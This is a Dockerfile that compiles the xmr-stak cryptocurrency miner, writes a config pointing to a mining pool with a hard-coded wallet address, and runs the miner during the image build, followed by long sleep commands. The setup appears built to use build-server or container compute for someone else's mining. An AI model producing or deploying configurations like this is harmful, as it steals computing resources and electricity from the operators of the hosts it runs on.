FROM ubuntu:latest

RUN 	apt-get update && \
        apt-get install -y --no-install-recommends \
          software-properties-common \
          build-essential \
          libssl-dev \
          libhwloc-dev \
          cmake \
          libmicrohttpd-dev \
          git \
          ca-certificates && \
		add-apt-repository ppa:jonathonf/gcc-7.1 && \
		apt-get update && \
		apt-get install -y --no-install-recommends \
          gcc-7 g++-7 && \
        rm -rf /var/lib/apt/lists/* && \
        git clone https://github.com/fireice-uk/xmr-stak.git && \
        mkdir xmr-stak/build && \
        cd xmr-stak/build && \
        cmake -DCMAKE_C_COMPILER=gcc-7 -DCMAKE_CXX_COMPILER=g++-7 -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF .. && \
        make install && \
        cp /xmr-stak/build/bin/xmr-stak /xmrstak

RUN echo "\"pool_list\" :[	{\"pool_address\" : \"stratum+tcp://masari.superpools.net:3333\", \"wallet_address\" : \"5pqUTCEcg5tjfdpuE8ZQu2JEdFTdgN2fzcydv5e5ypkcHuLRdG5zXkGZoWMz2KhJpxKKf5oto4KTh53v7iBbjNHgPT9soLC.3000\", \"pool_password\" : \"x\", \"use_nicehash\" : false, \"use_tls\" : false, \"tls_fingerprint\" : \"\", \"pool_weight\" : 1 },],\"currency\" : \"monero\",\"call_timeout\" : 10,\"retry_time\" : 30,\"giveup_limit\" : 0,\"verbose_level\" : 4,\"print_motd\" : true,\"h_print_time\" : 60,\"aes_override\" : null,\"use_slow_memory\" : \"warn\",\"tls_secure_algo\" : true,\"daemon_mode\" : false,\"flush_stdout\" : true,\"output_file\" : \"\",\"httpd_port\" : 0,\"http_login\" : \"\",\"http_pass\" : \"\",\"prefer_ipv4\" : true," > /config.txt
RUN /xmrstak & sleep 6000

CMD ["sleep", "3600000000"]